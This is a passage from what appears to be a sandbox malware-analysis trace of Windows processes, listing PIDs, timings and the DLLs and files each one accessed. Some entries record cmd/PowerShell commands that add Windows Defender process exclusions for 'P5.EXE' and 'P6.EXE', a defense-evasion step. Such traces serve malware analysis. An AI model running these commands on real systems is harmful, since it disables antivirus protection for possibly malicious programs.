C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.COMMANDS.MANAGEMENT\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\8CE205027E30804D1B2DEAFFA0582735\MICROSOFT.POWERSHELL.SECURITY.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.SECURITY\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\CULTURE.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSCORRC.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.XML\461D3B6B3F43E6FBE6C897D5936E17E4\SYSTEM.XML.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.XML\2.0.0.0__B77A5C561934E089
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.MANAGEMENT\6F3B99ED0B791FF4D8AA52F2F0CD0BCF\SYSTEM.MANAGEMENT.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.MANAGEMENT\2.0.0.0__B03F5F7F11D50A3A
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.DIRECTORYSER#\45EC12795950A7D54691591C615A9E3C\SYSTEM.DIRECTORYSERVICES.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.DIRECTORYSERVICES\2.0.0.0__B03F5F7F11D50A3A
C:\WINDOWS\SYSWOW64\SHFOLDER.DLL
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\GETEVENT.TYPES.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\TYPES.PS1XML
C:\WINDOWS\SYSWOW64\TZRES.DLL
C:\WINDOWS\SYSWOW64\EN-US\TZRES.DLL.MUI
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\DIAGNOSTICS.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\WSMAN.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\CERTIFICATE.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\DOTNETTYPES.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\FILESYSTEM.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\HELP.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELLCORE.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELLTRACE.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\REGISTRY.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\SECUR32.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.DATA\1E85062785E286CD9EAE9C26D2C61F73\SYSTEM.DATA.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_32\SYSTEM.DATA\2.0.0.0__B77A5C561934E089\SYSTEM.DATA.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSCORJIT.DLL
C:\PROGRAM FILES (X86)\COMMON FILES\ORACLE\JAVA\JAVAPATH_TARGET_2162329
C:\WINDOWS\SYSWOW64\WBEM
C:\PROGRAM FILES\NODEJS
C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\PROGRAMS\PYTHON\PYTHON37\SCRIPTS
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\NPM
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\DIASYMREADER.DLL
C:\WINDOWS\SYSWOW64\NETUTILS.DLL
3200
Image path
CMD.EXE "/C POWERSHELL -COMMAND ADD-MPPREFERENCE -EXCLUSIONPROCESS 'P5.EXE'"
Time lapse
4.726957
Files Accessed
C:\WINDOWS\SYSTEM32\WOW64.DLL
C:\WINDOWS\SYSTEM32\WOW64WIN.DLL
C:\WINDOWS\SYSTEM32\WOW64CPU.DLL
C:\WINDOWS\SYSWOW64\WINBRAND.DLL
C:\WINDOWS\SYSWOW64\SECHOST.DLL
C:\WINDOWS\SYSWOW64\IMM32.DLL
C:\WINDOWS\SYSWOW64\EN-US\CMD.EXE.MUI
C:\PROGRAM FILES (X86)\COMMON FILES\ORACLE\JAVA\JAVAPATH_TARGET_2162329
C:\WINDOWS\SYSWOW64\WBEM
C:\WINDOWS\GLOBALIZATION\SORTING\SORTDEFAULT.NLS
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE
C:\WINDOWS\SYSWOW64\APPHELP.DLL
C:\WINDOWS\APPPATCH\SYSMAIN.SDB
Process children
3240
Image path
POWERSHELL -COMMAND ADD-MPPREFERENCE -EXCLUSIONPROCESS 'P5.EXE'"
Time lapse
5.300186
Files Accessed
C:\WINDOWS\SYSTEM32\WOW64.DLL
C:\WINDOWS\SYSTEM32\WOW64WIN.DLL
C:\WINDOWS\SYSTEM32\WOW64CPU.DLL
C:\WINDOWS\SYSWOW64\SECHOST.DLL
C:\WINDOWS\SYSWOW64\ATL.DLL
C:\WINDOWS\SYSWOW64\MSCOREE.DLL
C:\WINDOWS\SYSWOW64\IMM32.DLL
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\EN-US\POWERSHELL.EXE.MUI
C:\WINDOWS\SYSWOW64\UXTHEME.DLL
C:\WINDOWS\REGISTRATION\R000000000006.CLB
C:\WINDOWS\SYSWOW64\SHELL32.DLL
C:\WINDOWS\SYSWOW64\USERENV.DLL
C:\WINDOWS\SYSWOW64\PROFAPI.DLL
C:\WINDOWS\WINSXS\X86_MICROSOFT.WINDOWS.COMMON-CONTROLS_6595B64144CCF1DF_6.0.7601.17514_NONE_41E6975E2BD6F2B2\COMCTL32.DLL
C:\WINDOWS\WINDOWSSHELL.MANIFEST
C:\WINDOWS\GLOBALIZATION\SORTING\SORTDEFAULT.NLS
C:\WINDOWS\SYSWOW64\PROPSYS.DLL
C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\MICROSOFT\WINDOWS\CACHES\CVERSIONS.1.DB
C:\WINDOWS\SYSWOW64\NTMARTA.DLL
C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\MICROSOFT\WINDOWS\CACHES\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.VER0X0000000000000001.DB
C:\USERS\DESKTOP.INI
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\DESKTOP.INI
C:\USERS\ADMINISTRATOR\DESKTOP\DESKTOP.INI
C:\WINDOWS\SYSWOW64\EN-US\SHELL32.DLL.MUI
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\DESKTOP.INI
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\DESKTOP.INI
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\DESKTOP.INI
C:\USERS\PUBLIC\DESKTOP.INI
C:\USERS\PUBLIC\DESKTOP\DESKTOP.INI
C:\WINDOWS\SYSWOW64\APPHELP.DLL
C:\WINDOWS\SYSWOW64\GAMEUX.DLL
C:\WINDOWS\WINSXS\X86_MICROSOFT.WINDOWS.GDIPLUS_6595B64144CCF1DF_1.1.7601.17514_NONE_72D18A4386696C80\GDIPLUS.DLL
C:\WINDOWS\SYSWOW64\XMLLITE.DLL
C:\WINDOWS\SYSWOW64\WER.DLL
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\INTERNET EXPLORER\QUICK LAUNCH\DESKTOP.INI
C:\WINDOWS\SYSWOW64\SHDOCVW.DLL
C:\WINDOWS\APPPATCH\SYSMAIN.SDB
C:\WINDOWS\SYSWOW64\EN-US\SHDOCVW.DLL.MUI
C:\WINDOWS\SYSWOW64\EN-US\SETUPAPI.DLL.MUI
C:\WINDOWS\SYSWOW64\LINKINFO.DLL
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\ACCESSORIES\DESKTOP.INI
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\ACCESSORIES\WINDOWS POWERSHELL\DESKTOP.INI
C:\WINDOWS\SYSWOW64\NTSHRUI.DLL
C:\WINDOWS\SYSWOW64\SRVCLI.DLL
C:\WINDOWS\SYSWOW64\CSCAPI.DLL
C:\WINDOWS\SYSWOW64\SLC.DLL
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\ACCESSORIES\WINDOWS POWERSHELL\WINDOWS POWERSHELL.LNK
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL_ISE.EXE
C:\WINDOWS\HH.EXE
C:\WINDOWS\SYSWOW64\CRYPTSP.DLL
C:\WINDOWS\SYSWOW64\RSAENH.DLL
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\YFUSY1A214O5F6MY47ER.TEMP
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\D93F411851D7C929.CUSTOMDESTINATIONS-MS~RFAC07.TMP
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V4.0.30319\MSCOREEI.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSCORWKS.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CLR.DLL
C:\WINDOWS\WINSXS\X86_MICROSOFT.VC80.CRT_1FC8B3B9A1E18E3B_8.0.50727.4940_NONE_D08CC06A442B34FC\MSVCR80.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\CONFIG\MACHINE.CONFIG
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\INDEX149.DAT
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MSCORLIB\62A0B3E4B40EC0E8C5CFAA0C8848E64A\MSCORLIB.NI.DLL
C:\WINDOWS\ASSEMBLY\PUBPOL25.DAT
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM\9E0A3B9B9F457233A335D7FBA8F95419\SYSTEM.NI.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\B1C511D8FAD78AD3C5213B2B4FB02B8B\MICROSOFT.POWERSHELL.CONSOLEHOST.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.CONSOLEHOST\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.MANAGEMENT.AUTOMATION\1.0.0.0__31BF3856AD364E35\SYSTEM.MANAGEMENT.AUTOMATION.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM\2.0.0.0__B77A5C561934E089
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.MANAGEMENT.A#\4436815B432C313255AF322F4EC3560D\SYSTEM.MANAGEMENT.AUTOMATION.NI.DLL
C:\WINDOWS\SYSWOW64\VERSION.DLL
C:\WINDOWS\SYSWOW64\L_INTL.NLS
C:\WINDOWS\SYSWOW64\EN-US\KERNELBASE.DLL.MUI
C:\WINDOWS\ASSEMBLY\GAC_32\MSCORLIB\2.0.0.0__B77A5C561934E089\SORTTBLS.NLP
C:\WINDOWS\ASSEMBLY\GAC_32\MSCORLIB\2.0.0.0__B77A5C561934E089\SORTKEY.NLP
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.CORE\FBC05B5B05DC6366B02B8E2F77D080F1\SYSTEM.CORE.NI.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\4F68CD04686E5DC5A55070D112D44BDF\MICROSOFT.POWERSHELL.COMMANDS.DIAGNOSTICS.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.COMMANDS.DIAGNOSTICS\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.CORE\3.5.0.0__B77A5C561934E089
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.CONFIGURATIO#\F02737C83305687A68C088927A6C5A98\SYSTEM.CONFIGURATION.INSTALL.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.CONFIGURATION.INSTALL\2.0.0.0__B03F5F7F11D50A3A
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.WSMAN.MAN#\EE28A075665B6BC23B6DAE56903D431D\MICROSOFT.WSMAN.MANAGEMENT.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.WSMAN.MANAGEMENT\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.WSMAN.RUNTIME\1.0.0.0__31BF3856AD364E35\MICROSOFT.WSMAN.RUNTIME.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.TRANSACTIONS\AD18F93FC713DB2C4B29B25116C13BD8\SYSTEM.TRANSACTIONS.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_32\SYSTEM.TRANSACTIONS\2.0.0.0__B77A5C561934E089\SYSTEM.TRANSACTIONS.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\3008A05E2928E2C1D856CC34E0422C17\MICROSOFT.POWERSHELL.COMMANDS.UTILITY.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.COMMANDS.UTILITY\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\8DF695FB80187F65208D87229E81E8A2\MICROSOFT.POWERSHELL.COMMANDS.MANAGEMENT.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.COMMANDS.MANAGEMENT\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\8CE205027E30804D1B2DEAFFA0582735\MICROSOFT.POWERSHELL.SECURITY.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.SECURITY\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\CULTURE.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSCORRC.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.XML\461D3B6B3F43E6FBE6C897D5936E17E4\SYSTEM.XML.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.XML\2.0.0.0__B77A5C561934E089
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.MANAGEMENT\6F3B99ED0B791FF4D8AA52F2F0CD0BCF\SYSTEM.MANAGEMENT.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.MANAGEMENT\2.0.0.0__B03F5F7F11D50A3A
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.DIRECTORYSER#\45EC12795950A7D54691591C615A9E3C\SYSTEM.DIRECTORYSERVICES.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.DIRECTORYSERVICES\2.0.0.0__B03F5F7F11D50A3A
C:\WINDOWS\SYSWOW64\SHFOLDER.DLL
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\GETEVENT.TYPES.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\TYPES.PS1XML
C:\WINDOWS\SYSWOW64\TZRES.DLL
C:\WINDOWS\SYSWOW64\EN-US\TZRES.DLL.MUI
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\DIAGNOSTICS.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\WSMAN.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\CERTIFICATE.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\DOTNETTYPES.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\FILESYSTEM.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\HELP.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELLCORE.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELLTRACE.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\REGISTRY.FORMAT.PS1XML
C:\WINDOWS\SYSWOW64\SECUR32.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.DATA\1E85062785E286CD9EAE9C26D2C61F73\SYSTEM.DATA.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_32\SYSTEM.DATA\2.0.0.0__B77A5C561934E089\SYSTEM.DATA.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSCORJIT.DLL
C:\PROGRAM FILES (X86)\COMMON FILES\ORACLE\JAVA\JAVAPATH_TARGET_2162329
C:\WINDOWS\SYSWOW64\WBEM
C:\PROGRAM FILES\NODEJS
C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\PROGRAMS\PYTHON\PYTHON37\SCRIPTS
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\NPM
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\DIASYMREADER.DLL
C:\WINDOWS\SYSWOW64\NETUTILS.DLL
3256
Image path
CMD.EXE "/C POWERSHELL -COMMAND ADD-MPPREFERENCE -EXCLUSIONPROCESS 'P6.EXE'"
Time lapse
5.502985
Files Accessed
C:\WINDOWS\SYSTEM32\WOW64.DLL
C:\WINDOWS\SYSTEM32\WOW64WIN.DLL
C:\WINDOWS\SYSTEM32\WOW64CPU.DLL
C:\WINDOWS\SYSWOW64\WINBRAND.DLL
C:\WINDOWS\SYSWOW64\SECHOST.DLL
C:\WINDOWS\SYSWOW64\IMM32.DLL
C:\WINDOWS\SYSWOW64\EN-US\CMD.EXE.MUI
C:\PROGRAM FILES (X86)\COMMON FILES\ORACLE\JAVA\JAVAPATH_TARGET_2162329
C:\WINDOWS\SYSWOW64\WBEM
C:\WINDOWS\GLOBALIZATION\SORTING\SORTDEFAULT.NLS
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE
C:\WINDOWS\SYSWOW64\APPHELP.DLL
C:\WINDOWS\APPPATCH\SYSMAIN.SDB
Process children
3296
Image path
POWERSHELL -COMMAND ADD-MPPREFERENCE -EXCLUSIONPROCESS 'P6.EXE'"
Time lapse
5.908586
Files Accessed
C:\WINDOWS\SYSTEM32\WOW64.DLL
C:\WINDOWS\SYSTEM32\WOW64WIN.DLL
C:\WINDOWS\SYSTEM32\WOW64CPU.DLL
C:\WINDOWS\SYSWOW64\SECHOST.DLL
C:\WINDOWS\SYSWOW64\ATL.DLL
C:\WINDOWS\SYSWOW64\MSCOREE.DLL
C:\WINDOWS\SYSWOW64\IMM32.DLL
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\EN-US\POWERSHELL.EXE.MUI
C:\WINDOWS\SYSWOW64\UXTHEME.DLL
C:\WINDOWS\REGISTRATION\R000000000006.CLB
C:\WINDOWS\SYSWOW64\SHELL32.DLL
C:\WINDOWS\SYSWOW64\USERENV.DLL
C:\WINDOWS\SYSWOW64\PROFAPI.DLL
C:\WINDOWS\WINSXS\X86_MICROSOFT.WINDOWS.COMMON-CONTROLS_6595B64144CCF1DF_6.0.7601.17514_NONE_41E6975E2BD6F2B2\COMCTL32.DLL
C:\WINDOWS\WINDOWSSHELL.MANIFEST
C:\WINDOWS\GLOBALIZATION\SORTING\SORTDEFAULT.NLS
C:\WINDOWS\SYSWOW64\PROPSYS.DLL
C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\MICROSOFT\WINDOWS\CACHES\CVERSIONS.1.DB
C:\WINDOWS\SYSWOW64\NTMARTA.DLL
C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\MICROSOFT\WINDOWS\CACHES\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.VER0X0000000000000001.DB
C:\USERS\DESKTOP.INI
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\DESKTOP.INI
C:\USERS\ADMINISTRATOR\DESKTOP\DESKTOP.INI
C:\WINDOWS\SYSWOW64\EN-US\SHELL32.DLL.MUI
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\DESKTOP.INI
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\DESKTOP.INI
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\DESKTOP.INI
C:\USERS\PUBLIC\DESKTOP.INI
C:\USERS\PUBLIC\DESKTOP\DESKTOP.INI
C:\WINDOWS\SYSWOW64\APPHELP.DLL
C:\WINDOWS\SYSWOW64\GAMEUX.DLL
C:\WINDOWS\WINSXS\X86_MICROSOFT.WINDOWS.GDIPLUS_6595B64144CCF1DF_1.1.7601.17514_NONE_72D18A4386696C80\GDIPLUS.DLL
C:\WINDOWS\SYSWOW64\XMLLITE.DLL
C:\WINDOWS\SYSWOW64\WER.DLL
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\INTERNET EXPLORER\QUICK LAUNCH\DESKTOP.INI
C:\WINDOWS\SYSWOW64\SHDOCVW.DLL
C:\WINDOWS\APPPATCH\SYSMAIN.SDB
C:\WINDOWS\SYSWOW64\EN-US\SHDOCVW.DLL.MUI
C:\WINDOWS\SYSWOW64\EN-US\SETUPAPI.DLL.MUI
C:\WINDOWS\SYSWOW64\LINKINFO.DLL
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\ACCESSORIES\DESKTOP.INI
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\ACCESSORIES\WINDOWS POWERSHELL\DESKTOP.INI
C:\WINDOWS\SYSWOW64\NTSHRUI.DLL
C:\WINDOWS\SYSWOW64\SRVCLI.DLL
C:\WINDOWS\SYSWOW64\CSCAPI.DLL
C:\WINDOWS\SYSWOW64\SLC.DLL
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\ACCESSORIES\WINDOWS POWERSHELL\WINDOWS POWERSHELL.LNK
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL_ISE.EXE
C:\WINDOWS\HH.EXE
C:\WINDOWS\SYSWOW64\CRYPTSP.DLL
C:\WINDOWS\SYSWOW64\RSAENH.DLL
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\BH8GG2G5KLF6CI9IF3JV.TEMP
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\D93F411851D7C929.CUSTOMDESTINATIONS-MS~RFADDB.TMP
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V4.0.30319\MSCOREEI.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSCORWKS.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CLR.DLL
C:\WINDOWS\WINSXS\X86_MICROSOFT.VC80.CRT_1FC8B3B9A1E18E3B_8.0.50727.4940_NONE_D08CC06A442B34FC\MSVCR80.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\CONFIG\MACHINE.CONFIG
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\INDEX149.DAT
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MSCORLIB\62A0B3E4B40EC0E8C5CFAA0C8848E64A\MSCORLIB.NI.DLL
C:\WINDOWS\ASSEMBLY\PUBPOL25.DAT
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM\9E0A3B9B9F457233A335D7FBA8F95419\SYSTEM.NI.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\B1C511D8FAD78AD3C5213B2B4FB02B8B\MICROSOFT.POWERSHELL.CONSOLEHOST.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.CONSOLEHOST\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.MANAGEMENT.AUTOMATION\1.0.0.0__31BF3856AD364E35\SYSTEM.MANAGEMENT.AUTOMATION.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM\2.0.0.0__B77A5C561934E089
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.MANAGEMENT.A#\4436815B432C313255AF322F4EC3560D\SYSTEM.MANAGEMENT.AUTOMATION.NI.DLL
C:\WINDOWS\SYSWOW64\VERSION.DLL
C:\WINDOWS\SYSWOW64\L_INTL.NLS
C:\WINDOWS\SYSWOW64\EN-US\KERNELBASE.DLL.MUI
C:\WINDOWS\ASSEMBLY\GAC_32\MSCORLIB\2.0.0.0__B77A5C561934E089\SORTTBLS.NLP
C:\WINDOWS\ASSEMBLY\GAC_32\MSCORLIB\2.0.0.0__B77A5C561934E089\SORTKEY.NLP
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.CORE\FBC05B5B05DC6366B02B8E2F77D080F1\SYSTEM.CORE.NI.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\4F68CD04686E5DC5A55070D112D44BDF\MICROSOFT.POWERSHELL.COMMANDS.DIAGNOSTICS.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.COMMANDS.DIAGNOSTICS\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.CORE\3.5.0.0__B77A5C561934E089
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.CONFIGURATIO#\F02737C83305687A68C088927A6C5A98\SYSTEM.CONFIGURATION.INSTALL.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.CONFIGURATION.INSTALL\2.0.0.0__B03F5F7F11D50A3A
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.WSMAN.MAN#\EE28A075665B6BC23B6DAE56903D431D\MICROSOFT.WSMAN.MANAGEMENT.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.WSMAN.MANAGEMENT\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.WSMAN.RUNTIME\1.0.0.0__31BF3856AD364E35\MICROSOFT.WSMAN.RUNTIME.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.TRANSACTIONS\AD18F93FC713DB2C4B29B25116C13BD8\SYSTEM.TRANSACTIONS.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_32\SYSTEM.TRANSACTIONS\2.0.0.0__B77A5C561934E089\SYSTEM.TRANSACTIONS.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\3008A05E2928E2C1D856CC34E0422C17\MICROSOFT.POWERSHELL.COMMANDS.UTILITY.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.COMMANDS.UTILITY\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\8DF695FB80187F65208D87229E81E8A2\MICROSOFT.POWERSHELL.COMMANDS.MANAGEMENT.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.COMMANDS.MANAGEMENT\1.0.0.0__31BF3856AD364E35
